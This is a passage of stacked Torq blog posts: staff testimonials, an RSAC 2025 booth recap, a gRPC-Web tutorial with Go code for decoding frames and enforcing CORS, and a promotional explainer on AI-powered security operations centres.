João pointed to a major shift in team autonomy. Before Torq, every automation request had to go through engineering. With a modern SOAR replacement, his team could build what they needed on their own: faster processes, better data correlation, and complete control over their workflows.

Learn how to make the switch like PO, João, Rich, and Kyle did.

Favorite Features and Go-To Tools

When asked which Torq features sealed the deal, each team member had a clear favorite — and a very good reason why.

PO pointed to case routing: “When you manage thousands of cases and a hundred analysts, things get missed. Torq’s case management made things manageable and improved the analyst experience overall.” Case management and Socrates, the AI SOC analyst, remain his go-to zones in the platform.

João loves the Collect operator: “It made my life so much easier.” Collect streamlines data gathering, making it simpler to manage and reference results across complex workflows. You’ll usually find him deep in workflow builds and data transformation.

Rich is all about nested workflows: Reusable, modular automation that keeps things clean and scalable. He spends his time on Canvas, where he builds POCs and custom demos.

Kyle highlighted Torq’s ability to convert any step to HTTP as a game-changer: “Way less overhead than scripting in legacy tools.” Lately, he’s been spending time exploring Interact workflows and pushing new features to the edge.

Life at Torq: What Surprised Them Most

One of the biggest surprises for PO, João, Rich, and Kyle after joining Torq was how closely the internal culture mirrored the customer experience. PO noted how refreshing it was to see the same positivity and partnership behind the scenes that he had experienced as a customer.

João was surprised by how much customer feedback directly influences the roadmap, realizing that Torq isn’t just listening, it’s actively building with its users. Rich was blown away by the pace of innovation, sharing how HyperSOC launched and then evolved rapidly within weeks. For Kyle, he knew he was boarding a rocket ship — but didn’t expect it to be going that fast.

“The pace of innovation at Torq is insane. HyperSOC came out — and within weeks, even more functionality was being rolled out.”

– Rich Chen, Sales Engineer, Torq

Want to join the team that killed SOAR?

Torq Drops Jaws at RSAC 2025


Torq roared into RSAC 2025 in our usual style: all gas, no brakes. Our team traveled in from around the world to set up an unmissable, unforgettable booth featuring Grave Digger that instantly became the talk of the show. (We also unleashed our Junior Media Intern, Trevor, on San Francisco, for which we apologize). But the real game-changer was our unveiling of new agentic AI innovations in Torq HyperSOC™ — with the demo that set RSAC on fire.  

Here are all the best moments.

Torq Steals the Pre-Show Spotlight

In the lead-up to RSAC, Torq announced the acquisition of stealth Israeli startup Revrod, whose multi-agent RAG (Retrieval-Augmented Generation) advancements are now incorporated into HyperSOC™. This latest release makes HyperSOC-2o our most autonomous model to date and the first truly agentic SecOps platform. 

This was followed by the announcement of another Torq “first” for autonomous security operations: becoming the first platform to support a Model-Context Protocol (MCP) natively in its architecture. 

Torq was also featured in the latest “new and notable” Microsoft Sentinel integrations ahead of RSAC. Rounding out the pre-conference press blitz, Forbes published an article detailing how Torq stands out in cybersecurity thanks to “bold branding and a fearless aesthetic… bringing edge, energy and authenticity to an industry known for playing it safe.”

“What really sets Torq apart is its effort to blend cultural relevance and brand identity with technical innovation.”

Tony Bradley, Senior Contributor, Forbes

The RSAC Booth Sensation: “Just, Wow.”

Yes, we really put all 12,000 pounds of the iconic Grave Digger monster truck in our booth. LinkedIn post after LinkedIn post declared it “the best booth at RSAC,” and the hype was electric. 

Forbes hailed the Torq booth’s visual elements as “more reminiscent of streetwear brands and music festivals than typical enterprise security vendors.” Security Weekly said that Torq “pulled out ALL THE STOPS MONSTER TRUCK LASER SKULLS F*&CK YEAH, that’s how you do it!” Chainsaw through the noise? Check.

The Demo That Set RSAC on Fire

While Grave Digger drew people in, it was Torq’s technology that kept hundreds of security pros around our booth for demo after demo. 

Leading up to RSAC, HyperSOC’s agentic AI innovation was validated by industry analysts, with IDC’s new report stating: “Torq is working on all SOC fronts while improving MTTD, MTTR, threat hunting, and remediation actions impactfully. The agentic AI architecture is disruptive.” 

We also got a shout-out ahead of RSAC from Cyber Research Analyst Francis Odum, who stated: “Torq HyperSOC makes the potential of AI in a SOC attainable and sustainable by connecting AI with the SOC’s full range of tools and processes. Torq HyperSOC is a huge game-changer for enterprises.”

To top it all off, mid-conference, Torq won the 2025 SC Media Award for Best Emerging Tech for our platform’s agentic AI capabilities, which were described as “the forefront of next-gen security automation.”

“Everyone says ‘agentic AI,’ but that’s the first demo I’ve seen actually working live.”
Heard at RSAC

Beyond the Moscone Center

On the first night of the conference, two of Torq’s co-founders — CTO Leonid Belkind and CINO Eldad Livni — hosted an exclusive Founders’ Dinner at Michelin-star restaurant Boulevard with CISOs and security leaders from major brands around the globe.

Moving into day three of RSAC, Torq CMO Don Jeter sat down with George Kamide and George Al-Koura from the Bare Knuckles & Brass Tacks podcast to talk through how Torq’s marketing blew up from a small 10×10 booth at RSAC just a few years ago to this year’s monster display. When the Georges asked how Torq built such “a fundamentally cool brand”, Don shared that it all started with the fierce belief that SOAR is dead and then telling that story boldly — which hit a community nerve to create “something that people want to be a part of.”

Watch the episode here >

“Tech is lame. Torq is cool.”

– George A., Bare Knuckles & Brass Tacks podcast

Unleashing the Most Feral Channel Program in Cybersecurity

During the conference, Sheldon Muir, Torq’s AVP of Global Channels, spoke with MSSP Alert about how our disruptive partner program prioritizes customer outcomes — driving results, incentives, and value for our partners. More on this coming soon!

“Great tech — which I obviously believe Torq has — has to be met by great marketing. And the third leg of the stool is you gotta have something disruptive on the channel side.”

Sheldon Muir, AVP of Global Channels, Torq

On to the Next

Thousands of steps logged, energy drinks downed, and Bone Bucks handed out later, the Torq team said goodbye to the Moscone Center, but that’s not the end of the road for Torq + Grave Digger. Torq has partnered with Monster Jam® for a 6-city tour this summer. Find your city and save your seat here.

Want to see the HyperSOC demo that set RSAC on fire? Request a demo.

gRPC-web: Using gRPC in Your Front-End Application


This blog was originally published in October 2021. It was last updated in May 2025.

At Torq, the AI-native autonomous SOC and security Hyperautomation leader, we use gRPC as our one and only synchronous communication protocol. Internally, microservices communicate with each other using gRPC. Externally, our frontend application uses gRPC-Web to communicate with the backend APIs via an API Gateway. 

While gRPC offers many benefits, its adoption in frontend development lags behind REST APIs and GraphQL. This gap can pose challenges for frontend developers accustomed to analyzing traffic with Chrome’s built-in Network Inspector.

Originally published over three years ago, this blog post now addresses the introduction of ConnectRPC, a new protocol for frontend-to-backend communication via gRPC. ConnectRPC resolves certain limitations of gRPC-Web and offers enhanced code generators for TypeScript and JavaScript. 

Importantly, adopting these new generators does not necessitate a complete switch of transport protocols, as the generated client and server code provide support for both gRPC-Web and the newer ConnectRPC protocol. We switched to using those code generators at Torq and are extremely pleased with the improved developer experience.

This article explains how to enable communication between a frontend application and a gRPC backend over the gRPC-Web protocol, demonstrated with a client generated by the connect-es proto plugin.

Backed by the CNCF community, gRPC stands out as a popular and active project. It offers official support for over ten programming languages and well-defined best practices, making it an excellent option for API development. These characteristics aligned perfectly with Torq’s needs when selecting an API protocol.

gRPC offers a straightforward approach to service definition. Developers define services and methods using proto files. Subsequently, the proto compiler facilitates the generation of server and client interfaces compatible with various programming languages. This includes TypeScript and Go, the primary languages employed internally at Torq.

From a technical perspective, gRPC-Web requires a proxy (such as Envoy or Caddy) between the web client and the gRPC server to translate between the two protocols. The client code is generated from the same .proto service definitions the backend uses, but gRPC-Web uses a slightly different wire format and does not support every gRPC feature (full bidirectional streaming, for example). It supports both binary protobuf and JSON serialization and works with modern frontend frameworks such as React, Angular, and Vue.
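The wire format just mentioned is small enough to show in full. The following is an added example in Go (the language of the API Gateway described below), not code from the original post or from Torq: it encodes gRPC-Web frames to build sample traffic, decodes a response body back into messages and trailers while checking every length prefix against the bytes actually present, and handles the base64 application/grpc-web-text variant, whose per-frame padding breaks a naive one-shot decode. The frame layout and content-type names are the protocol’s own; the function and type names are assumed for this example.

```go
package main

import (
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
	"strings"
)

// gRPC-Web frame header: 1 byte of flags, then a 4-byte big-endian payload length.
const (
	FlagData     byte = 0x00 // payload is one protobuf message
	FlagTrailers byte = 0x80 // payload is HTTP/1-style trailers (grpc-status, grpc-message)
)

// Response is a decoded unary gRPC-Web response body.
type Response struct {
	Messages [][]byte          // protobuf payloads in wire order
	Trailers map[string]string // lower-cased trailer names -> values
}

// EncodeFrame builds one frame the way the proxy does; used here to construct sample traffic.
func EncodeFrame(flags byte, payload []byte) []byte {
	hdr := make([]byte, 5)
	hdr[0] = flags
	binary.BigEndian.PutUint32(hdr[1:], uint32(len(payload)))
	return append(hdr, payload...)
}

// DecodeTextBody undoes application/grpc-web-text: each frame is base64-encoded on its own
// and the chunks concatenated, so '=' padding can appear mid-body and a single
// base64.DecodeString call would reject it. Decode chunk by chunk instead.
func DecodeTextBody(s string) ([]byte, error) {
	var out []byte
	for len(s) > 0 {
		i := strings.IndexByte(s, '=')
		if i < 0 {
			i = len(s)
		}
		for i < len(s) && s[i] == '=' {
			i++ // keep the whole padding run with its chunk
		}
		chunk, err := base64.StdEncoding.DecodeString(s[:i])
		if err != nil {
			return nil, err
		}
		out, s = append(out, chunk...), s[i:]
	}
	return out, nil
}

// DecodeResponse walks the frames of a binary (application/grpc-web+proto) response body.
// Every length prefix is checked against the bytes present; a data frame after the trailers,
// unknown flags, or a body that never carries grpc-status is an error, not a guess.
func DecodeResponse(body []byte) (*Response, error) {
	resp := &Response{Trailers: map[string]string{}}
	sawTrailers := false
	for len(body) > 0 {
		if len(body) < 5 {
			return nil, errors.New("truncated frame header")
		}
		flags, n := body[0], binary.BigEndian.Uint32(body[1:5])
		body = body[5:]
		if uint64(n) > uint64(len(body)) {
			return nil, fmt.Errorf("frame claims %d bytes, only %d remain", n, len(body))
		}
		payload := body[:n]
		body = body[n:]
		switch {
		case flags == FlagData && !sawTrailers:
			resp.Messages = append(resp.Messages, payload)
		case flags == FlagTrailers && !sawTrailers:
			sawTrailers = true
			for _, line := range strings.Split(string(payload), "\r\n") {
				if k, v, ok := strings.Cut(line, ":"); ok {
					resp.Trailers[strings.ToLower(strings.TrimSpace(k))] = strings.TrimSpace(v)
				}
			}
		default:
			return nil, fmt.Errorf("unexpected frame (flags 0x%02x)", flags)
		}
	}
	if !sawTrailers {
		return nil, errors.New("response ended without a trailers frame")
	}
	return resp, nil
}
```

A request body uses the same framing with data frames only; the trailers frame is what carries grpc-status back to the browser on the response side.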

What is ConnectRPC?

Connect is a suite of libraries designed to create APIs compatible with both browsers and gRPC. It offers a JSON-based protocol as an alternative to native gRPC, supporting features like streaming, trailers, and error details.

The ConnectRPC project launched a new protocol along with multiple proto-compilers for major programming languages. The resulting code is not only compatible with this new protocol but also maintains full interoperability with existing gRPC and gRPC-Web implementations.

Connect-es, its proto compiler, produces high-quality code, offering frontend developers an excellent experience through language-native gRPC interfaces both in the backend and the browser.

ConnectRPC introduces a JSON-based text protocol over HTTP, addressing gRPC challenges such as caching.

A Quick Overview of Our Architecture

We use a microservice architecture at Torq. Our backend APIs are accessible by an API Gateway (Backend for Frontend), which is built in Go and provides services such as:

  • Smart routing to internal services
  • Aggregator pattern that allows combining data coming from multiple internal services into a single response 
  • gRPC-Gateway proxy, which we use to allow REST API access to our public APIs 
  • gRPC-Web proxy that translates requests coming from the frontend application using the grpc-web protocol to gRPC requests.

Our application utilizes an API Gateway as the sole entry point for all external traffic. This gateway centralizes API access and comprises a collection of gRPC services. The continuous integration (CI) process for the API Gateway repository includes the automatic generation of TypeScript client libraries.

Building gRPC-Web Clients Using Connect-es Plugin

As mentioned above, at Torq, we generate TypeScript clients for all our external APIs as part of our CI (GitHub Actions) continuous integration build process, which is a component of the API Gateway service. 

We previously used a bash script for pre-installing proto compiler plugins and running the protoc command. Over the last two years, we transitioned to the Buf CLI tool, which has streamlined the process. Buf allows us to define proto-generation rules in a single YAML file, eliminating the need for local protoc plugin installations.

For our gRPC-Web client, we utilize the Connect-es protoc plugin to generate TypeScript files. These files are then packaged as an npm package and published to the GitHub package repository. Our frontend applications integrate this package using the standard `npm install` command.

Go Server, VueJS, and gRPC-Web Client Example

Below is the gRPC service definition:

This gRPC service defines a simple TimeService. It provides a method for getting the current time via the GetCurrentTime RPC method. The time is returned in ISO 8601 format.

Generating Clients and Servers

To generate client and server code from the proto file, we will utilize the Buf CLI tool. While the `protoc` compiler could also be used, Buf CLI streamlines this process by reducing friction. We will employ the Go and TypeScript proto-compilers to generate code for these specific languages.

To generate the code, we will use the following `buf.gen.yaml` file:

The generated files for Go will be placed under ./time/goclient and the JavaScript ones will be in /frontend-ts/src/jsclient.

gRPC in the Backend

Our backend is a very basic Go server implementation. We spin up the gRPC server listening on 0.0.0.0:8080. It implements the TimeServiceServer interface and returns time.Now().Format(time.RFC3339) for each request.

gRPC in the Frontend

Using the Connect-ES library, calling gRPC-Web endpoints is straightforward. Simply initialize the client with the gRPC-Web server address and then invoke its methods.

For easier debugging of gRPC web traffic in your browser, consider installing the gRPC-Web Devtools Chrome extension. This tool provides an inspection capability similar to Chrome’s built-in Network Activity Inspector.

Envoy Configuration

gRPC-Web requires a proxy for gRPC translation. Envoy offers built-in support, as demonstrated by the provided configuration. A frequent issue is CORS configuration. The example below shows a permissive wildcard domain setting, which is not recommended for production. However, it can be adapted for specific production needs with minor adjustments.
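The Envoy file itself is not reproduced here. As an added example (not Torq’s gateway code), the same decision is expressed in Go for a gateway like the one in the architecture section above: a wildcard policy next to an exact-origin allowlist, the request headers a gRPC-Web client sends permitted on preflight, and the grpc-status and grpc-message response headers it must be able to read exposed. Policy, Decide and Middleware are names assumed for this example; the header names are the protocol’s.

```go
package main

import (
	"net/http"
	"strings"
)

// Policy is the CORS decision in front of the gRPC-Web endpoint. This is an added Go
// stand-in for the Envoy cors settings, not the gateway's real code.
type Policy struct {
	// AllowedOrigins lists exact browser origins (scheme://host[:port]). Empty means
	// wildcard: the permissive setting that is fine for a demo and wrong for production.
	AllowedOrigins []string
	// AllowCredentials adds Access-Control-Allow-Credentials; never combined with "*".
	AllowCredentials bool
}

// WildcardPolicy mirrors the permissive demo configuration: any origin is accepted.
func WildcardPolicy() Policy { return Policy{} }

// ProductionPolicy is the tightened version: only the listed frontend origins.
func ProductionPolicy(origins ...string) Policy { return Policy{AllowedOrigins: origins} }

// Request headers a gRPC-Web (Connect-ES) browser client sends, and the response headers
// it must be allowed to read. Without these the preflight fails or grpc-status is hidden.
const (
	allowHeaders  = "content-type,x-grpc-web,x-user-agent,grpc-timeout,authorization"
	exposeHeaders = "grpc-status,grpc-message"
)

// Decide returns the CORS headers to emit for one request. allowed == false means the
// origin is not on the list and the request must be refused without any CORS headers.
func (p Policy) Decide(origin string, preflight bool) (headers map[string]string, allowed bool) {
	if origin == "" {
		return nil, true // same-origin or non-browser caller: CORS does not apply
	}
	h := map[string]string{"Access-Control-Expose-Headers": exposeHeaders}
	switch {
	case len(p.AllowedOrigins) == 0:
		h["Access-Control-Allow-Origin"] = "*"
	case contains(p.AllowedOrigins, origin):
		h["Access-Control-Allow-Origin"] = origin
		h["Vary"] = "Origin" // the response now depends on the Origin header; tell caches
		if p.AllowCredentials {
			h["Access-Control-Allow-Credentials"] = "true"
		}
	default:
		return nil, false
	}
	if preflight {
		h["Access-Control-Allow-Methods"] = "POST, OPTIONS" // gRPC-Web is POST-only
		h["Access-Control-Allow-Headers"] = allowHeaders
		h["Access-Control-Max-Age"] = "600"
	}
	return h, true
}

func contains(list []string, s string) bool {
	for _, v := range list {
		if strings.EqualFold(v, s) {
			return true
		}
	}
	return false
}

// Middleware enforces Policy in front of the gRPC-Web handler and answers preflights itself.
func Middleware(p Policy, next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		preflight := r.Method == http.MethodOptions && r.Header.Get("Access-Control-Request-Method") != ""
		hdrs, ok := p.Decide(r.Header.Get("Origin"), preflight)
		if !ok {
			http.Error(w, "origin not allowed", http.StatusForbidden)
			return
		}
		for k, v := range hdrs {
			w.Header().Set(k, v)
		}
		if preflight {
			w.WriteHeader(http.StatusNoContent)
			return
		}
		next.ServeHTTP(w, r)
	})
}
```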

A Five-Year Perspective on gRPC-Web

This blog post aims to provide an accessible introduction to gRPC-Web, a valuable technology for those already invested in gRPC. Since the original publication, the gRPC-Web ecosystem has matured considerably with the introduction of powerful tools. Notably, the Buf CLI has streamlined the command-line interface and configuration for compiling proto files into client and server-side code. Furthermore, the Connect-ES proto compiler plugin enhances the development experience by generating more natural and intuitive client-side code.

Our team has leveraged gRPC-Web for five years, appreciating the advancements in tooling that have emerged during this time. For further exploration, the source code referenced in this article is accessible here.

Want to learn more about Torq? Watch our 4-minute video to see how Torq’s AI–driven Hyperautomation platform helps security teams automate more, faster.

AI SOC, Explained: How AI-Powered SOCs Transform SecOps


Security Operations Centers (SOCs) are the command center of an organization’s frontline cybersecurity defenses — responsible for monitoring threats, prioritizing alerts, and orchestrating remediation. However, today’s SOCs are facing an existential crisis: an overwhelming volume of increasingly complex and sophisticated threats combined with a shortage of skilled analysts. This perfect storm is pushing SOCs to their breaking point, burning out their teams and leaving their organizations vulnerable.

Legacy security automation solutions struggled to keep up with the evolving threat landscape, especially at scale. The rise of artificial intelligence (AI) has been hailed as a game-changer for SOCs, offering the potential for unprecedented efficiency gains.

But what does effective use of AI in the SOC look like? Below, we show top use cases for leveraging AI in the SOC and explore how AI is transforming security operations.

The Technical Foundations of an AI-Powered SOC

Security automation has evolved way past SOAR — with Hyperautomation and AI Agents forming the new cornerstones of the modern autonomous SOC.

  • AI-driven Hyperautomation: By seamlessly integrating your security stack and instantly automating any security process using thousands of pre-built integration steps and AI-generated workflows, Hyperautomation offloads routine tasks, reduces analyst burnout, and accelerates threat response.
  • Multi-Agent System: Specialized AI Agents automate incident response by interpreting natural language instructions and collaborating to autonomously execute tasks such as alert triage, containment, and remediation actions. Human analysts can interface with the AI agents using natural language for accelerated enrichment, investigation, and recommended next steps.

What’s the Difference? All the AI in the SOC, Explained

This new landscape of AI in the SOC comes with a LOT of similar-but-different terminology. GenAI, AI Agents, OmniAgents, agentic AI, multi-agent systems — we get it, it can be confusing. 
Here’s a breakdown of all the AI powering modern security operations, what each one does, and how Torq HyperSOC™ puts them all to work.

Term | Definition | What It Does | How Torq HyperSOC™ Uses It
GenAI | GenAI creates content, code, text, images, or predictions in response to natural language prompts | Enhances SOC operations with automated case summaries, enrichment, and workflow generation | Drafts incident summaries, generates workflow templates, and speeds up case documentation
Agentic AI | Agentic AI is autonomous, goal-driven AI that plans, adapts, and executes multi-step security workflows across time and tools | Powers AI agents with autonomy and adaptability to handle tasks like detection, triage, and response in real time | Socrates, the AI SOC Analyst, coordinates and makes workflow decisions autonomously without human-triggered actions
AI Agent | An AI Agent is a single AI entity that independently handles a specialized task | Performs specific security tasks such as isolating endpoints, locking accounts, or enriching threat intelligence based on predefined triggers | Powers single-task automations: pulling threat intel, scanning suspicious emails, updating ServiceNow or Jira tickets
Multi-Agent System (MAS) | A Multi-Agent System is composed of multiple autonomous AI agents that collaborate to achieve complex goals | Deploys specialized AI agents in parallel across the SOC to handle triage, investigation, containment, and case management | MAS architecture: Runbook Agent, Investigation Agent, Remediation Agent, and Case Management Agent, all coordinated by Socrates
OmniAgent | An OmniAgent acts as a “Super Agent” orchestrating the activities and interactions between specialized AI Agents in a MAS | Uses sophisticated iterative planning and reasoning to solve complex, multi-step problems autonomously through the coordination of multiple AI Agents | Socrates identifies, prioritizes, and remediates threats across the entire organization by controlling and coordinating the Runbook, Investigation, Remediation, and Case Management Agents

Top Use Cases for AI in the SOC

By analyzing vast amounts of data from across your security stack and executing intelligent automations, AI unlocks efficiency gains across SOC functionalities such as:

  • Incident investigation: Analyze massive volumes of alerts to identify patterns, suppress low-fidelity alerts, and automate triage and validation, accelerating the investigation process from start to resolution. 
  • Case management: Streamline the process of prioritizing, tracking, and managing security incidents by intelligently enriching and automating cases.
  • Workflow generation: Prompt AI with a natural language description of your use case to instantly build security automation workflows — no code required.
  • Case summarization: Analyze all relevant data points associated with a security alert to provide easy-to-digest, evidence-backed summaries of complex security cases, improving SOC analysts’ efficiency and collaboration.
  • Documentation: Automatically generate documentation for complex automated processes, increasing both efficiency and accuracy from shift-handovers to compliance audits.
  • Executive reporting: Prompt the system to generate case info in the right tone and level of information for a specific persona, such as for a non-technical executive or board member. 
  • Team collaboration: Automatically alert Slack or Teams channels when a case is created, escalated, resolved and more.
  • Resource optimization: Use AI to assign cases to an available analyst based on workload and shift schedules. 
  • Data correlation: Combine and correlate data from all of the tools in your security stack, providing a holistic view of your security environment.
  • Threat response: Automate tasks like threat detection and containment for faster incident resolution.

How Do AI-Powered SOCs Transform Traditional Security Operations? 

Scaling SOC operations: AI agents can handle an influx of security events: triaging, investigating, and remediating the majority of Tier-1 and Tier-2 alerts. This frees up analyst bandwidth to focus on urgent incidents and strategic projects, enabling SOCs to efficiently scale their operations without increasing headcount (which is vital amidst today’s shortage of skilled cybersecurity talent).

Shifting to a proactive security posture: Agentic AI goes beyond detecting and counteracting attacks by applying real-time intelligence to identify patterns and spot emerging threats. This lets SOCs take a less reactive, more preemptive approach and address vulnerabilities before they can be exploited.

Reducing alert fatigue and analyst burnout: By autonomously triaging alerts and reducing false positives, AI agents reduce the number of irrelevant alerts that analysts must wade through. And, by automating tedious, repetitive tasks and auto-remediating most low-level alerts, AI-driven Hyperautomation helps senior analysts gain back the time and capacity to focus on more rewarding work like strategic projects. 

Speeding up MTTR: All of the efficiency gains from leveraging AI in the SOC translate to more alerts resolved, faster.

Will AI Replace Humans in the SOC?

Adopting AI in the SOC is not about replacing human SOC analysts — it’s about augmenting and empowering them. With a looming 4 million+ cybersecurity talent shortage, organizations must not only retain their existing analysts, but also help them work more efficiently. On top of that, organizations are recognizing that human-only defenses are inadequate to counter the evasive and persistent threats posed by AI-driven attacks.

AI reduces analyst burnout: A multi-agent system can reduce the strain on SOC teams by offloading rote tasks, auto-remediating the majority of Tier 1 tickets, and upleveling the skills of junior analysts. This frees up senior analysts to focus their expertise on critical threats and strategic projects, helping their organization achieve a stronger overall security posture.

Human expertise must remain the final line of defense: Done the right way, AI-powered SOCs keep humans “in the loop” as the ultimate decision-makers for high-stakes threats following rigorous, multi-tiered AI evaluation and case enrichment that helps human analysts take informed, decisive action.

“By 2028, multiagent AI in threat detection and incident response will rise from 5% to 70% of AI implementations to primarily augment — not replace — staff.”

Source: Gartner Inc.

How Torq’s AI Capabilities Supercharge SecOps

Torq has been very deliberate in how we’ve extended the capabilities of the Torq platform using AI to solve real problems for SOCs with products and features like:

  • Socrates, the OmniAgent AI SOC Analyst: Socrates intelligently automates alert triage, incident investigation, and response, extending your SOC teams’ capabilities and improving response times across the board. Socrates coordinates a full Multi-Agent System (MAS) — planning, investigating, remediating, and managing security cases with human-like decision-making and machine-speed execution. 

    Socrates can auto-remediate 95% of cases within minutes. For critical cases that require human intervention, your analysts can collaborate with Socrates using natural language to summarize case details, enrich cases with additional investigation and threat intelligence, and trigger remediation workflows.
  • AI Workflow Builder: Simply describe your desired security automation workflow in natural language, and Torq’s AI Workflow Builder will generate a tailored solution in seconds. Rather than spending hours manually building workflows from scratch, your team is freed up to focus on more strategic security initiatives.
  • AI Case Summaries: Help your team make the right decisions quickly by presenting them with a concise, insightful, and verifiable AI-generated summary of each case. No more wading through pages of logs and incident details! The easy-to-read summaries empower SOC teams to work faster, make informed decisions with confidence, and seamlessly transition between shifts by giving the incoming team clear case context backed by citations.
  • AI Data Transformation: Simplify complex data manipulation for security operations by easily transforming complex JSON data using natural language — no coding required. Each transformation is broken down into precise, testable micro-transformations that users can edit, validate, and modify individually.
  • Runbook Execution: Intelligently plan customized investigation and response strategies based on the organization’s historical outcomes and adapt to new threat vectors, ensuring faster containment.
  • Deep Research Investigations: Uncover hidden attack patterns across disparate data sources, perform detailed root cause analyses, and dynamically assess threat impact — giving SOC teams context previously out of reach without hours of manual digging.

Torq now has multi-agent RAG (Retrieval-Augmented Generation) incorporated into HyperSOC™ which has supercharged its ability to do deep research, analyze threats, and coordinate responses at machine speed — and is the first autonomous security platform to support a Model-Context Protocol (MCP) natively in its architecture. These advancements make our latest HyperSOC release our most autonomous model to date and the first truly agentic SecOps platform. 

The Future of the SOC: Better, Faster Human Decision-Making Through AI Automation and Insights

When deployed effectively, AI in the SOC extends and enhances the capabilities of your existing staff so they can make better decisions faster. 

So, what does the future of SOC automation look like? Sophisticated multi-agent AI continuously learns from historical data and real-time incidents to generate insights and recommendations, automate routine security tasks, and auto-remediate the majority of alerts, with a top layer of human analysts providing strategic oversight for critical cases. This means faster, more proactive responses to threats and vulnerabilities — and a more secure future for organizations everywhere.

Want to learn how to deploy AI in the SOC the right way? Read the AI or Die Manifesto to learn CISO considerations, fake AI red flags, and evaluation questions.